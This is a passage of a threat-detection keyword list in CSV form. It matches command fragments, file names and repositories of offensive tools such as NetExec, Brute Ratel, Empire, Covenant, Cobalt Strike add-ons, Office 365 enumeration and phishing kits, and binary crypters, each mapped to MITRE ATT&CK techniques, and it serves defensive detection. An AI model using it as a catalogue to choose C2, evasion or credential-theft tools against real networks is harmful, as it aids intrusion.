*",".{0,1000}nxc\ssmb\s.{0,1000}\.csv\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc smb *.txt -u *",".{0,1000}nxc\ssmb\s.{0,1000}\.txt\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc ssh *",".{0,1000}nxc\sssh\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc winrm * -X *",".{0,1000}nxc\swinrm\s.{0,1000}\s\-X\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc*nxcdb.py*",".{0,1000}nxc.{0,1000}nxcdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active 
Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc.netexec:main*",".{0,1000}nxc\.netexec\:main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc.protocols.smb*",".{0,1000}nxc\.protocols\.smb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxcdb-zipapp-*",".{0,1000}nxcdb\-zipapp\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NYAN-x-CAT/Lime-Crypter*",".{0,1000}NYAN\-x\-CAT\/Lime\-Crypter.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" 
"*nysm.skel.h*",".{0,1000}nysm\.skel\.h.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*nysm-master.zip*",".{0,1000}nysm\-master\.zip.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*nyxgeek*",".{0,1000}nyxgeek.{0,1000}","offensive_tool_keyword","Github Username","github user hosting exploitation and recon tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/nyxgeek","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nyxgeek/lyncsmash*",".{0,1000}nyxgeek\/lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*nyxgeek/ntlmscan*",".{0,1000}nyxgeek\/ntlmscan.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*nyxgeek/o365recon*",".{0,1000}nyxgeek\/o365recon.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*nyxgeek/teamstracker*",".{0,1000}nyxgeek\/teamstracker.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*-o kitten.exe*",".{0,1000}\-o\s\skitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*o_getprivs*",".{0,1000}o_getprivs.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*o365-Attack-Toolkit*",".{0,1000}o365\-Attack\-Toolkit.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*o365-attack-toolkit*",".{0,1000}o365\-attack\-toolkit.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","991","211","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*o365creeper.git*",".{0,1000}o365creeper\.git.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","4","307","61","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper.py*",".{0,1000}o365creeper\.py.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","4","307","61","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper-master*",".{0,1000}o365creeper\-master.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","4","307","61","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365enum.py*",".{0,1000}o365enum\.py.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - 
Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*o365enum-master*",".{0,1000}o365enum\-master.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*o365recon.ps1*",".{0,1000}o365recon\.ps1.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*o365recon-master*",".{0,1000}o365recon\-master.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*oab-parse.py*",".{0,1000}oab\-parse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*oaburl.py */*:*@* -e *",".{0,1000}oaburl\.py\s.{0,1000}\/.{0,1000}\:.{0,1000}\@.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*obfuscate.py grunt*",".{0,1000}obfuscate\.py\sgrunt.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Obfuscate.py*",".{0,1000}Obfuscate\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*obfuscate/shellter*",".{0,1000}obfuscate\/shellter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*obfuscate_cmdlet*",".{0,1000}obfuscate_cmdlet.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*obfuscate_command*",".{0,1000}obfuscate_command.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - 
T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*obfuscated_module_source/*",".{0,1000}obfuscated_module_source\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*obfuscation.exe --*",".{0,1000}obfuscation\.exe\s\-\-.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*obfuscation.exe -f * -t *",".{0,1000}obfuscation\.exe\s\-f\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*obfuscator*antidisassembly.*",".{0,1000}obfuscator.{0,1000}antidisassembly\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*obfuscator.cpp*",".{0,1000}obfuscator\.cpp.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*obfuskittiedump*",".{0,1000}obfuskittiedump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*objects_constrained_delegation_full.txt*",".{0,1000}objects_constrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_rbcd_delegation_full.txt*",".{0,1000}objects_rbcd_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_unconstrained_delegation_full.txt*",".{0,1000}objects_unconstrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objexec *.o*",".{0,1000}objexec\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*obscuritylabs*",".{0,1000}obscuritylabs.{0,1000}","offensive_tool_keyword","Github Username","resources for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/obscuritylabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*obscuritylabs/ase:latest*",".{0,1000}obscuritylabs\/ase\:latest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*obscuritylabs/RAI/*",".{0,1000}obscuritylabs\/RAI\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*octetsplicer/LAZYPARIAH*",".{0,1000}octetsplicer\/LAZYPARIAH.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*Octoberfest7/JumpSession_BOF*",".{0,1000}Octoberfest7\/JumpSession_BOF.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*Octoberfest7/KDStab*",".{0,1000}Octoberfest7\/KDStab.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*Octoberfest7/TeamsPhisher*",".{0,1000}Octoberfest7\/TeamsPhisher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*octopus.py *",".{0,1000}octopus\.py\s.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*OEP_Hiijack_Inject_Load*",".{0,1000}OEP_Hiijack_Inject_Load.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" 